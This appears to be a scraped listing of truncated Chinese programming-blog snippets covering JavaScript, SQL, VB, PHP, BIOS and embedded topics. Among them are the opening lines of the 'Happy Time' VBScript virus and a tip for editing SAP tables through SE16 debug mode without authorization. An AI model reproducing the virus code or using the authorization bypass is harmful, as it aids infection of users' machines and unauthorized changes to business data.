转载自:http://www.cnblogs.com/qiangsheng/archive/2009/03/18/1415073.html 这个函数模块可以弹出一个窗口,根据用户传入显示若干个单/多选按钮,并将用户选择返回。
POPUP_TO_DECIDE_LIST Dialog box for choosing from a list …
var GridName "uwgrdMain";function SelectCheck() //
선택되어 있는 행 체크 하기{var grid igtbl_getGridById(GridName);for(
var i0; i
function SelectUncheck() // 선택되어 있는 행 체크해제하기{ var grid igtbl_getGridById(GridName); for(var i0; i …
今日在CSDN论坛上评论到这样的标题时,想到了该怎么解决预防"提交"按钮的多次点击的问题【prevent multiple clicks of a submit button in ASP.NET】,如果要是记录到数据库那不是很好的办法,该怎么办呢?想来想去我以前做…
http://www.vcworld.net/news/200909/092714.html 编译错误信息 说明:Turbo C 的源程序错误分为三种类型:致命错误、一般错误和警告。其中,致命错误通常是内部编译出错;一般错误指程序的语法错误、磁盘或内存存取错误或命令行错…
递归查询文件名.vbs
dim ws,fso,f,fd,files,tmpname,url,result,preFixset wscreateobject("wscript.shell") set fso CreateObject("Scripting.FileSystemObject") set fd fso.getfolder(ws.currentdirectory) set filesfd.files 生成前缀resultws.cur…
查询文件名(带日期及大小)_0714_1655.vbs dim ws,fso,f,fd,files,tmpname,url,result,preFixset wscreateobject("wscript.shell") set fso CreateObject("Scripting.FileSystemObject") set fd fso.getfolder(ws.currentdirectory) set filesfd.files …
int setsockopt( SOCKET s, int level, int optname, const char* optval, int optlen);
对于这个函数的level级别的参数到底有哪些, optname ,对应的又有哪些,一直很纳闷,终于今天抽空看了下msdn,leve ---- opt…
<title>aa</title><script type"text/javascript"> var step0; var _title1document.title; var _title2雅致人生服装服饰; function flash_title() { step; if (step3) {step1;} if (step1) {document.title_title2;} i…
paper类型: Original research articles:必须有一定的创新性研究, Review articles Fast Communications Research articles should not exceed 30 pages (single column, double spaced) in length and must contain novel research within …
提起面向对象我们就能想到类,对象,封装,继承,多态。在《javaScript高级程序设计》(人民邮电出版社,曹力、张欣译。英文名字是:Professional JavaScript for Web Developers)这本书中…
function lastname(){//获取欲上传的文件路径 var filepath document.getElementById("file1").value; //为了避免转义反斜杠出问题,这里将对其进行转换 var re /(\\)/g; var filenamefilepath.replace(re,"#");//对路径字符串进行剪切截取va…
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns"http://www.w3.org/1999/xhtml"><head><title>JavaScript全选与反选</t…
jquery 文本框得到焦点,给表单的文本框设置初始值,当鼠标点击输入的时候,文本自动消失,用户可又输入数据,想知道jQuery是如何获取文本框得到失去的焦点吗?那么您就看这个例子吧。 <!DOCTYPE html PUBLIC…
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns"http://www.w3.org/1999/xhtml"><head><title>表单验证提示效果</title…
using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Data; using System.Data.SqlClient; using System.IO; namespace Function { /// <summary> /// 将DataSet写成CSV文件 /// </summary> p…
一,复制舞台上的影片剪 方法1——反射方法: var ClassRef:Class getDefinitionByName(getQualifiedClassName(t_mc)) as Class;var clone_mc:DisplayObject new ClassRef();
addChild(clone_mc);方法2——构造器方法: var ClassRef:Class …
有时存储过程会连续的返回多个结果形状,比如下面的存储过程:CREATE PROCEDURE MultipleResultTypesSequentiallyASSELECT * FROM ProductsSELECT * FROM Customers 此时就会返回产品结果和客户结果,而且是按着顺序返回的。此代码示范的就是如…
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv"Content-Type" content"text/html; charsetutf-8"> <title>图片随机飘动代码生成器</title> <style…
--生成测试数据CREATE TABLE T_TABLE(id int IDENTITY(1,1) NOT NULL,upid int NULL,title [varchar](50))
INSERT INTO T_TABLE (upid,title) values(0,1TITLE)INSERT INTO T_TABLE (upid,title) values(0,2TITLE)INSERT INTO T_TABLE (upid,title) values(0,3TITLE)INSERT I…
因为农历的日期,是由天文学家推算出来的,到现在只有到2049年的,以后的有了还可以加入!
CREATE TABLE SolarData
(
yearId int not null,
data char(7) not null,
dataInt int not null
)
--插入数据
INSERT INTO
SolarData SELEC…
当授予对给定模板的实例的访问权时候,在作用域中不需要存在该类模板或函数模板的声明。实质上,编译器将友元声明也当作类或函数的声明对待(When we grant access to all instances of a given template, there need not be a declaration for that class…
Objective
目标
Google Maps Javascript API V3 has introduced the implementation of MVC objects that allow map objects to store state and update their presentation automatically, which are awesome, but what can you do with them? Google Maps JavaScript AP…
‘*************** 欢乐时光 ***************
Rem I am sorry! happy time
On Error Resume Next
Mload
‘以上为病毒入口,并加上I am sorry! happy time的注释,以表明此文件已被感染过。 Sub mload()
On Error Resume Next
mPath Grf()
Set Os …
最近在研究Interface elements for jQuery(http://interface.eyecon.ro/),此插件封装了一些拖拽效果,并且使用非常简单,能轻松实现拖拽排序、购物车、博客首页排版等UI,所以模仿和讯的图片排序做了一个简单…
C# 字符串相似度的算法(用sqlserver函数实现)CREATE function get_semblance_By_2words ( word1 varchar(50), word2 varchar(50) ) returns nvarchar(4000) as begin declare re int declare maxLenth int declare i int,l int declare tb1 table(c…
<?php//冒泡排序函数
//本函数使用引用是为了避免不必要的内存消耗
function &bubble(&$arr){$countcount($arr);if($count>1){for($i0;$i<$count;$i){for($j$count-1;$j>$i;$j--){if($arr[$j-1]>$arr[$j]){$temp$arr[$j-1];$arr[$j-1]$arr[$j];$arr[$…
以下代码加入HTML的<body>区: <script language"javascript">
<!-- Begin
function chk(email, formname)
{
invalid ""; if (!email)
invalid "请输入您的Email地址。"; else { if ( (email.indexOf("&q…
前台: function Select(txtId,ddlId) {function myFunc() {//alert(document.getElementById(txtId).value);//alert(document.getElementById(ddlId).value);var data document.getElementById(txtId).value;var ddlgradelevel document.getElementById(ddlId);for (var i …
<?php//选择排序功能函数
//使用引用,减少内存消耗
function &select(&$arr){$countcount($arr);if($count>1){for($i0;$i<$count-1;$i){$k$i;for($j$i1;$j<$count;$j){if($arr[$j]<$arr[$k]){$k$j;}}if($k!$i){$tmp$arr[$k];$arr[$k]$arr[…
用shell写了个递归遍历目录的脚本,本脚本实现递归遍历指定目录,打印目录下的文件名(全路径)。不为别的,就为了以后用着方便。
#!/bin/sh function scandir() { local cur_dir parent_dir workdir workdir$1 cd ${work…
我们在 Linux 下运行一个程序,有时会无法启动,报缺少某某库。这时需要查看可执行程序或者动态库中的符号表,动态库的依赖项, Linux 有现成的工具可用:objdump 。 有时我们拿到一个静态库,想调用其中的函数&…
1. 从http://ckeditor.com中下载ckeditor for java和ckfinder for java。 2. 将下载的文件解压,将ckeditor文件夹和ckfinder文件夹放置到项目根目录下,其中ckfinder文件夹在ckfinder*.war中。 3. ckfinder*.war的WEB-INF目录下有一个config.xml文件&…
VC 和 MFC 的一些常见问题 如何抛出(throw)由CUserException派生的异常? 当我试图捕获(catch)一个派生类异常时,我得到以下错误"error C2039:classCMyException: is not a member of CMyException cl…
vb透明控件
Public Declare Function SetWindowRgn Lib "user32 " (ByVal hwnd As Long, ByVal hRgn As Long, ByVal bRedraw As Boolean) As Long Public Declare Function CreateRectRgn Lib "gdi32" (ByVal X1 As Long, ByVal Y1 As Long, ByVal X2 As…
Web sql 是在浏览器模拟数据库,可以使用JS来操作SQL完成对数据的读写,但是这个东西目前支持的浏览器不多,而且其W3C规范已经停止支持,貌似其前景不是很明朗
W3C 规范:http://www.w3.org/TR/webdatabase/#dom-sqltrans…
很多时候我们需要知道Windows操作系统的版本,使用下面这个API函数可以做到。 Option Explicit Private Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" (lpVersionInformation As OSVERSIONINFO) As Long Private Type O…
输入一个RSS地址:代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns"http://www.w3.org/1999/xhtml"><head><title>this is test<…
下面是转别人的,无所谓,其实用Jquery的hover方法就可以了,用不了这么麻烦,只是自己懒,不想写了,直接copy别人的算了HTML code//repeater鼠标悬停变色 var se; function myrepeaterse(id) { se id.style.backgroundColor; id.style.backgroundColor#FFFFCC…
HTML code<html><head><title>类似MSN提示的页面效果</title></head><body scrollno>看到右下角的提示了吗?如果没有看到,<button onclicklocation.reload();>刷新</button>一下<script language&qu…
表的一个字段varchar类型,select * from a where f1var(传入参数)f1比如为"AA,BGF,YH",var为"BGF,YH,AA".也就是说相同的值,只是排列顺序不同.怎么写个简单函数来判断相等?当然可以SUBSTRING()一个一个取来判断,显得比较麻烦. --创建用户定义函数create f…
Microsoft Radio Interface Layer
Cellcore 上面是 Windows CE Communication_Services 的架構圖。 CellCore represents a strategic wireless architecture for products based on Windows CE. The intent of the architecture is to provide a core set of services that w…
如果你的服务器的另一端返回的信息已经是 HTML 了,那么使用这个程序包中
Ajax.Updater 类将使你的生活变得更加得容易。用它你只需提供哪一个元素需要被 AJAX 请求返回的 HTML 填充就可以了,例子比我写说明的更清楚:
<script>functio…
3> 调用User Mode Driver Host API来将Driver Load到内存 CeFsIoControl()实际上是一个对文件系统驱动FSD进行操作的函数,需要传入文件夹名字和IoControlCode。 帮助文档中对该函数的解释如下:
This function sends an I/O control to a file …
总结了一些有代表性的贴子,具体见http://expert.csdn.net/Expert/topic/2440/2440306.xml?temp.6941645
1: 列转为行:eg1:Create table test (name char(10),km char(10),cj int)goinsert test values(张三,语文,80)insert test values(张三,数学,86)insert test …
前台脚本: function GetUrl(url,name,iWidth,iHeight,e) { var url; //转向网页的地址; var name; //网页名称,可为空; var iWidth; //弹出窗口的宽度; var iHeight; //弹出窗口的高度; var iTop (window.screen.availHeight-30-iHeight)/2; //获…
脚本说明: 把如下代码加入<body>区域中: <SCRIPT LANGUAGE"JavaScript">
<!-- Begin function run() { with (document.agecalc) { dd parseInt(day.selectedIndex) 1; mm parseInt(month.selectedIndex) 1; yy year.value; if (yy.…
DLL(Dynamic Link Library)是一段特殊的代码,它能够被外部程序在程序运行的时候调用。在DLL里面的代码可以同时被许多外部程序共享,而且不会引起手机内存的重复分配。
静态接口vs多态接口Symbian系统支持两种类型的DLL:(1)静态接…
var text a journey of a thousand miles begins with single step.;var newText text.replace(//b/w/b/g, function(word) {return word.substring(0,1).toUpperCase( ) word.substring(1);});alert(newText);
原文出处:http://twaver.servasoft.com/?p3620
Flash Player 11.2新加了一个非常重要的特性:支持右键,具体参见:Flash Player 11.2 Beta Features 下面是在TWaver Flex的Network中使用右键菜单的效果,等了多少年的功…
--可支持大字符集20000个汉字! create function f_ch2py(chn nchar(1)) returns char(1) as begin declare n int declare c char(1) set n 63 select n n 1, c case chn when chn then char(n) else c …
as3中的addEventListener事件监听会自动传递一个事件对象参数给处理函数,可是不能传递其他参数. 如果要为事件处理函数送参数的话可以用这种方法: 见代码: 执行结果输出11 package { import flash.events.MouseEvent; public class aa { public static var X:Number11; …
<script language"JavaScript"><!-- Hide script from old browsers function init(){ // Microsoft Internet Explorer if (document.all){ document.all.loading.style.visibility"hidden"; document.all.myapplet.style.vis…
1.创建type,必须是单独的type,在pkg中的不行
CREATE OR REPLACE TYPE obj_txb_xb97 as TxbLE OF rec_xb97;
CREATE OR REPLACE TYPE rec_xb97 AS OBJECT( xoe001 NUMBER(18), xxe901 NUMBER(18), xxe140 VARCHAR2(3), xxe210 VARCHAR2(3), xxb210…
<script language"javascript"> ///设置全选 function SelectAllCheckboxes(spanChk,chkboxname){ var oItem spanChk.children; var theBox(spanChk.type"checkbox")?spanChk:spanChk.children.item[0]; xStatetheBox.checked; …
FlashMediaServer3.0安装包中将Samples文件夹(具体路径:Flashmedia3_Int_Strm_ALP/Documentation/Samples)中的所有文件复制到FMS3安装路径下Program Files/Adobe/Flash Media Server 3/applications文件夹中,目的主要是建立服务器…
2009-08-09
摘自《Sun Studio 12: C 用户指南》 第 6.7.3 节 模板在使用前必须先声明。一个友元声明构成了模板的使用,而非模板的声明。(A friend declaration constitutes a use of the template, not a declaration of the template. )所以…
【我所认知的BIOS】->反汇编BIOS之Bootblock(3)
--initialize some chipset register
By Lightseed
5/13/2010
在上一篇中,我和大家探讨了下面代码中的BT_CPU_Init这个函数,它主要是一些特殊CPU的micro code的update。那么我们继续往下走…
Who may read this document? 1. People who familiar with gdb but not never use kgdb 2. People who like to debug kernel or driver module using the gdb way. Why to Using KGDB 1. Want to debug kernel 2. Want to debug driver module What’s hardware you needed …
source:http://jcraane.blogspot.com/2009/02/introduction-to-genetic-algorithms-with.html 偶然遇见的好文章,共享之。
Introduction to Genetic Algorithms with JGAP Out of interest I am familiarizing myself in genetic algorithms, in short GA. My int…
FROM:
http://www.rit.edu/~pnveme/pigf/ThreeDGraphics/thrd_index.html
不同形状的矩形
The rectangle is a graphic object that is very useful to represent simple animation through simple graphics. A moving rectangle and text is shown in the following code.…
function text(e){var t "";//如果传入的是元素,则继续遍历其子元素,//否则假定它是一个数组e e.childNodes || e;//遍历所有字节点for ( var j 0; j<e.length; j ){//如果不是元素,追加其文本值//否则,递归遍历所有元素的子节…
一个MATLAB 函数的规范化格式实例山城棒棒儿军 07-20 10:58function visfem % Main: Set up data to demonstrate usage of visfem. % visfem: Visualises linear finite element functions on unstructered % triangular grids or bilinears on rectangular grids by differe…
Win CE 5.0 下面 USB Client Function Driver 目前有提供Serial Profile (Emulator a Serial Port, CESYSGEN_MODULE_SERIALUSBFN, set SYSGEN_USBFN_SERIAL) RNDIS Profile (Emulator a Network Card, CESYSGEN CE_MODULE_RNDISFN, set SYSGEN_USBFN_ETHERNET1) Mass Storage …
关于MDK配置,请看前面的文章 mini2440裸机程序 如何点亮led灯 基于MDK4.11版 http://hi.baidu.com/如来大悲/blog/item/c6150233be4692a45edf0e02.html /**************************************************************The initial and control for 640480 16Bpp …
今天在论坛中有人问ext和asp.net是如何进行交互的,对于一个刚入门的新手来说,这个问题可能会使其比较迷惑,下面我写一个非常简单的例子来说明一下ext如何与asp.net来进行数据交互 Default.htm: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" &…
在使用jquery操作js时,经常整不明白this与$(this)。抽空仔细测试了一把,记录下来以供在忘记的时候拉出来参考参考!原来js中的this这么好用
$(document).ready(function(){ var DragElementnull; $("#zz").mousedown(funct…
遇到问题:在使用xhr发出请求时,请求的url中参数带中文,这时在后台解析request得不到中文如:request new ActiveXObject("Microsoft.XMLHTTP");request.open("GET", url);中我的url需要带中文参数直接加参数是…
<% page contentType"text/html; charsetGBK" %><html><head><title>calendar</title><script language"javascript">function changeDay(form){ //得到年份 var year form.year.value; //得到月份 var month f…
闭包的两个特点:1、作为一个函数变量的一个引用 - 当函数返回时,其处于激活状态。
2、一个闭包就是当一个函数返回时,一个没有释放资源的栈区。例1。 <script type"text/javascript"> function sayHello2(name) { var text …
在提到上述的概念之前,首先想说说Javascript中函数的隐含参数:arguments
Arguments
该对象代表正在执行的函数和调用它的函数的参数。
[function.]arguments[n]参数function :选项。当前正在执行的 Function 对象的名字。 n :选…
//去掉数组中的重复元素function unique(data) { data data || []; var a {}; for (var i 0; i < data.length; i) { var v data[i]; if (typeof (a[v]) undefined) { a[v] 1; } }; data.length 0; for (var i in…
官方例子: SummaryIt may prove beneficial to validate user input within the client-side events. The BeforeExitEditModeHandler allows for a perfect time to validate the the input and "lock" the user on the cell until proper data has been entered.Ad…
设计过程1 编程的本质是:没有意外,最小化耦合,最大化内聚
2 根除复杂性这个恶魔(Part 1)
2.1 不要解决不存在的问题2.2 解决一个问题,而不要解决一类问题
3 A user interface should not look like a computer program (the tr…
function DateUtil(){}/***功能:格式化时间*示例:DateUtil.Format("yyyy/MM/dd","Thu Nov 9 20:30:37 UTC0800 2006 ");*返回:2006/11/09*/DateUtil.Formatfunction(fmtCode,date){ var result,d,arr_d; var patrn_now_1/^y{4}-M{2}-d{2}/sh{2}:m{2…
转自:http://blog.csdn.net/veryhappy/archive/2007/05/16/1612007.aspx
By satalaj翻译:veryhappy(wx.net)介绍
当用户关闭IE或其它浏览器时,Session对象不会结束。Session会在最后一次访问时开始计算达到Web.config中定义的时…
打小票要设置一下打印区域 internet 文件 页面设置jQuery打印插件PrintArea实现jQuery打印插件PrintArea实现实现javascript打印功能,打印整个页面就很简单,但如果指定打印某一个区域就有点难点,这里有一个jQuery插件PrintArea可实现打印页面…
还要研究一下jQuery。
script.js$(document).ready(function(){$(#checkAll).click(function(){updateCheckBoxStatus(this);});}function updateCheckBoxStatus(currentCheckBox){ var statecurrentCheckBox.checked; var parentTablesjQuery(currentCheckBox).parent…
判断是否为本地文件(另转:本地图片文件路径正则表达式)只要 d:/ ......
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><HTML> <HEAD> <TITLE> New Document </TITLE> <META NAME"Generator&…
javascript来判断客户端文件的大小<HTML><HEAD>
<SCRIPT>function getFileSize (fileName) { if (document.layers) { if (navigator.javaEnabled()) { var file new java.io.File(fileName); if (location.protocol.toLowerCase() ! file:) net…
<script>
function switchMenu(evt){
var eleevt.target||evt.srcElement; //分别针对非ie和ie,获取事件的源对象
if(ele.tagName"H1"){ //如果是<h1>
var uluele.parentNode.getElementsByTagName("ul");
for(var i0;i<ulu.le…
测试方法
private function Test():void
{ for(var j:int0;j<5;j) { trace("插入10000项"); var t1:int, t2:int; var i:int 0; var a:Array new Array(); var al:ArrayCollection new ArrayCollection(); var item:String; var v:Vector.<Str…
第一个标签页中鼠标滑过显示不同的标签页,第二个标签页中点击不同标签加载其他页面中的内容,加载等待的图片缓慢隐藏: /WebRoot/4.Tab.html: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" &quo…
下面是实现: <% page language"java" contentType"text/html; charsetUTF-8" pageEncoding"UTF-8"%> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/lo…
<% **************************** 类 字符串形式的数据库操作 建立 jaken 日期 05-4-20 **************************** Class clsDbStrDB 公开的连接 Public ActiveConnection 表 Public Tb 对应的标志字段 Markid Public Markid Public Id 字段 (删除时候对应的…
有些情况下,constraint不能简单用一行来表达,而是需要复杂的计算,如果都写到constraint block内部就比较复杂,而且很乱,这时候可以调用functions来约束随机变量。在constraint内调用function就称为”function in const…
1.for.. 数组迭代的用法 Usage of for..in to iterate Arrays 举例:
var myArray [ “a”, “b”, “c” ];
var totalElements myArray.length;
for (var i 0; i < totalElements; i) {console.log(myArray[i]);
} 这里主要的问题是语句中的“for..."不…
转自:http://www.zhizhihu.com/html/y2010/2292.htmlKernel FunctionsBelow is a list of some kernel functions available from the existing literature. As was the case with previous articles, every LaTeX notation for the formulas below are readily ava…
这有一篇关于使用system函数在后台运行一个程序的文章,http://stackoverflow.com/questions/2711520/how-can-i-run-perl-system-commands-in-the-background 文中有如下几点需要注意: 1.Perls system function has two modes: (1)taking a single stri…
1.html代码: window.html源代码: Html代码 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> < html > < head > < title > jquery实例1:深入浅出窗口</ titl…
function B bfltGray(A,w,sigma_d,sigma_r)
% Pre-compute Gaussian distance weights.
[X,Y] meshgrid(-w:w,-w:w);
G exp(-(X.^2Y.^2)/(2*sigma_d^2));% Apply bilateral filter.
dim size(A);
B zeros(dim);
for i 1:dim(1)for j 1:dim(2)%这里的处理方式采用批方式&…
又拿起了曾经用过的东西,在一条线上取距离多远的点的坐标。
记得曾经搞过,重新整理一下。 ArcSDE Transformation函数中包含函数SE_LocateAlong。 For geometries that have measures, the location of a particular measure can be found with the SE…
*& 手工更改采购订单项目里发票标签下的最终交货复选框 report zmmr0191 message-id zfd_01. tables:ekpo. data:begin of it_ekpo occurs 0, ebeln like ekko-ebeln, ebelp like ekpo-ebeln, wemng like eket-wemng, menge like ekpo-menge, invoiced_menge like ekbe-men…
How many clients can IceStorm support?
转自http://zeroc.com/blogs/matthew/2008/08/20/how-many-clients-can-icestorm-support/ … or how long is a piece of string? From an IceStorm perspective, there are two types of clients: Publishers: Clients that pub…
转自http://www.codeguru.com/cpp/i-n/ieprogram/article.php/c4399/
Introduction
Sometimes, when we are using the IE Browser Control inside of a C application, we need to access the HTML elements. We can do it by using standard COM objects such as IWebBro…
1.问题:
# make ... ./satellite -I./wpan -o satellite/sat-hdlc.o satellite/sat-hdlc.cc./satellite/sat-hdlc.h: In member function ‘virtual void HDLC::hdr_dst(Packet*, int)’:./satellite/sat-hdlc.h:193: 错误:‘HDR_HDLC’ 在此作用域中尚…
代码:/** * 定义一个全局对象, 属性 Version 在发布的时候会替换为当前版本号 */ var Prototype { Version: VERSION } /** * 创建一种类型,注意其属性 create 是一个方法,返回一个构造函数。 * 一般使用如下 * var X Class.create(); 返…
用VC向导生成的基于对话框的程序中,在对话框的OnInitDialog()函数中,总可以看到如下的代码段: BOOL CXXXDlg::OnInitDialog() { ...... // Set the icon for this dialog. The framework does this automatically // when t…
以下总结的内容来自于Coverity Prevent分析,SECURE_CODING 是Prevent中关于编码安全方面的一个检查器,是全球百万余开发人员从历史上的各种安全漏洞事件中总结出来的。 [VERY RISKY]. Use of "strcpy" has been known to cause a buffer over…
<一>在Delphi中静态调用DLL top
调用一个DLL比写一个DLL要容易一些。首先给大家介绍的是静态调用方法,稍后将介绍动态调用方法,并就两种方法做一个比较。同样的,我
们先举一个静态调用的例子。
unit Unit1;
interface
uses Wi…
IP Helper API 简介 其中最主要的两个函数是GetNumberOfInterfaces和GetInterfaceInfo,前者指出网络接口的个数,后者提取网络接口的信息。对于第一个函数要说明的一点是它好象并没有返回正确的值,因为据MSDN描述:一个网络接口是…
function getQueryString(key){var value ""; //获取当前文档的URL,为后面分析它做准备var sURL window.document.URL;//URL中是否包含查询字符串if (sURL.indexOf("?") > 0){//分解URL,第二的元素为完整的查询字符串//即arrayParams[1]的值为【firs…
搞了好长时间,终于把2440的PWM搞定了,原来错误是出在我的疏忽上,有一句话没有好好看:NOTE: The bits have to be cleared at next writing.
下面是PWM的设置步骤:
一、设置CLKCON的PWMTIMER位为1。Control PCLK into PWMTIMER block. 0 D…
/**************************创建XMLHttpRequest对象**************************/function CreateRequest(){var xmlObj null;try {xmlObj new XMLHttpRequest();}catch(e){try{xmlObj new ActiveXObject("MSXML2.XMLHTTP");}catch(e2){try{xmlObj new ActiveXOb…
一、原题 Which four are types of functions available in SQL? (Choose 4) A. string B. character C. integer D. calendar E. numeric F. translation G. date H. conversion Answer: B,E,G,H二、题目翻译 下面哪四种是SQL中的函数类型?(选四个) A.字符串 B.字符类型 …
首先自定义函数,IDE工具栏上,报表->报表属性->tab页中的"代码",在文本框中加入如下代码
Public Function ConvertValue(ByVal value As Object) As StringIf IsNothing(value) or Len(Trim(value))0 ThenReturn 0ElseReturn valueEnd IfEnd Functi…
函数是模块化,抽象化的实施者。
如何查看matlab的内建函数
查看matlab内建的函数“mean.m”, 计算平均数
在命令行窗口输入edit(which(mean.m)) 会跳出一个.m文件
>> edit(which(mean.m))function y mean(x,dim,flag,flag2)
%MEAN Average or mean val…
可以根据是否隐藏来实现导出功能,如果隐藏则不导出。 主要代码: [codeJScript]//指定页面区域“单元格”内容导入Excel function CellAreaExcel() { var oXL new ActiveXObject( "Excel.Application "); var oWB oXL.Workbo…
十分简单...There is a way to change entries of a table with SE16 even if you dont have the authorization: Go in SE16, enter your table Name (ex: MARA). Display the entry (or entries) you want to modify. When you have your entry, write /H to go in debug mod…
1.英文编码 function Encode7bit(Src:String):String; var Dst:String; i:Integer; CurS,NextS:Byte; TStr:String; begin for i:1 to Length(Src) do begin //当前是字符按8位分组的第8位,无需编码(8个字符已缩短为7个ÿ…
js实现右键 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <TITLE> New Document </TITLE> <META NAME"Generator" CONTENT"EditPlus"> <META NAME"Author"…
下面贴出使用迅雷下载的webThunderDetect.js源码:
function _xlThunderQtyPV(){try{vhref "http://analytics-union.xunlei.com/PV?peerid0&urihttp://thunderqtypv.union.xunlei.com&src" document.domain;image1 new Image(1,1);image1.srcvhref;} ca…
校验上传附件大小function ShowFileInfo() { var fso new ActiveXObject("Scripting.FileSystemObject"); var f, s, file; if ("object" ! typeof(fso)) return; file myForm.fjwj0.value; f fso.GetFile(file); alert(f.size);
}
事件冒泡
事件捕获:父级元素先触发,子级元素后触发
事件冒泡:子级元素先触发,父级元素后触发 现在在IE和FF下,触发事件基本都是事件冒泡,由内向外的执行 <!DOCTYPE html PUBLIC "-//W3C//DTD XH…
转自:http://biosengineer.blogspot.com/2007/10/bios-pci-scan-9.html這次要提的是: PCI ! [About PCI device]1. 每一個PCI device都有其 unique PFA(PCI Function Address). PFA由 bus number,device number & function number所組成.Ex. USB device PFA is …
C STL set和multiset的使用1,set的含义是集合,它是一个有序的容器,里面的元素都是排序好的,支持插入,删除,查找等操作,就 像一个集合一样。所有的操作的都是严格在logn时间之内完成,…
┏〓〓〓〓〓〓〓〓〓 GetRndBeTween3,start 〓〓〓〓〓〓〓〓〓┓[简介]:产生任意数之间随机数(支持负数)Function GetRndBeTween3(Number1 As Long, Number2 As Long) As DoubleVB源码,帮你写函数&#x…
GNU C的一大特色(却不被初学者所知)就是__attribute__机制。__attribute__可以设置函数属性(Function Attribute)、变量属性(Variable Attribute)和类型属性(Type Attribute)。__att…
来自:http://blog.csdn.net/ruixj/archive/2009/06/16/4274721.aspx GNU C的一大特色(却不被初学者所知)就是__attribute__机制。__attribute__可以设置函数属性(Function Attribute)、变量属性(Variab…
测试代码如下:
function testSpeed(){for(var i0; i<100000; i){$(oHref);}};var begTime1 new Date();testSpeed();var endTime1 new Date();var begTime new Date();eval(testSpeed(););var endTime new Date();$(divShow).innerHTML ("time1:"…
自己以为解释static 解释比较好的列子,希望大家,也能通过它来理解
<?php// USING the same method in an instance and in a static context// If you want to have the same definition of a method that you// want to use both as static and as…
使用jetty版本:jetty-websocket-8.0.4.v20111024.jar
使用servletapi版本:3.0
服务器端servlet继承 WebSocketServlet 实现websocket连接。如下代码:
public class Communicate extends WebSocketServlet {private static final long seri…
1. PHP可阅读随机字符串此代码将创建一个可阅读的字符串,使其更接近词典中的单词,实用且具有密码验证功能。/***************length - length of random string (must be a multiple of 2)**************/function readable_random_string($length 6){$…
看见有个面试题目,求x, y的值: int i 3, j 3; int x (i) (i) (i); int y (j) (j) (j); 看到挺多人在争论,这样的表达式值应该是多少?甚至拿出几个不同的编译器来编译运行得到几个不同的结果。对于此题的答案,…
什么是lua Lua 是一种轻量小巧的脚本语言,用标准C语言编写并以源代码形式开放, 其设计目的是为了嵌入应用程序中,从而为应用程序提供灵活的扩展和定制功能。 Lua 是巴西里约热内卢天主教大学(Pontifical Catholic University of Rio de Janeiro)里的一个研究小组,由Rober…
【我所認知的BIOS】—>Super IO
By LightSeed
2009-9-2
1、Superio概述
Super I/O芯片也叫I/O芯片。在486以上档次的主板上都有I/O控制电路。因为在南桥这样的高速设备和串行、并行接口、软盘驱动器及键盘鼠标等大量低速设备之间必定存在资源的不匹配,而需…
转载地址:http://hi.baidu.com/%C8%BA%C9%BD%C1%AA%C3%CB/blog/item/db45ee1221828859f819b8b1.html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">…
相关图片
当页面实际内容高度大于浏览器可视区域高度时
a. IE下 b. FF下 当页面实际内容高度小于浏览器可视区域高度时
a. IE下 b. FF下 由此有以下结论 clientHeight 在IE和FF下,该属性没什么差别,都是指浏览器的可视区域,即除去…
JS自带函数 concat 将两个或多个字符的文本组合起来,返回一个新的字符串。 var a "hello"; var b ",world"; var c a.concat(b); alert(c); //c "hello,world" indexOf 返回字符串中一个子串第一处出现的索引(从左到右…
资源: 使用ajax页面(发送和响应);一个处理服务器页面;还使用了一个可重用net.js.1.html<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <title>1.html</title> <script type"text/javas…
计算闰年主要是为了判断2月份的天数,一般闰年2月份是29天,平年2月份是28天。计算闰年的算法非常简单,即:能被400整除,或者能被4整除而不能被100整除。
算法如下: function isLeapYear(pYear) set oregn…
本教程是演示如何利用PHP和Jquery无刷新提交一个表单,然后将表单信息以邮件的形式发送给管理员。
演示与下载: 查看演示Ajax Form 下载实例Demo Zip (解压密码为:www.code52.net ) Tips: 如果演示出现js错误或无法正常显示&am…
/*获得TEXT.AREATEXT的值*/ var textval $(”#text_id”).attr(”value”); //或者 var textval $(”#text_id”).val(); /*获取单选按钮的值*/ var valradio $(”input[typeradio][checked]“).val(); /*获取一组名为(items)的radio被选中项的值*/ var item $(’input[nam…
Spring exeception 在spring,hibernate中异常的处理都交给了spring框架,在hibernate只需要写很少的代码就可以实现异常的控制。 在单元测试代码中: public final void testFindFunctionById() { logger.debug("testFindFunctionBy…
.html部分:
JqueryMenu.html源代码: Html代码 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> < html > < head > < title > Jquery 实例2:弹出菜单</ titl…
简介:本节介绍usb full speed function的四种传输类型。 上节中我们了解到了usb host 与usb function 之间采用的是一种“非对称”的传输,也就是说,无论usb接受数据还是发送数据,都是由usb host首先发起。即传输的第一个packet总是…
Js为Tr添加onmouseover事件jquery加入到工程中(见csdn空间6/js/jquery.js)<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-
transitional.dtd"><h…
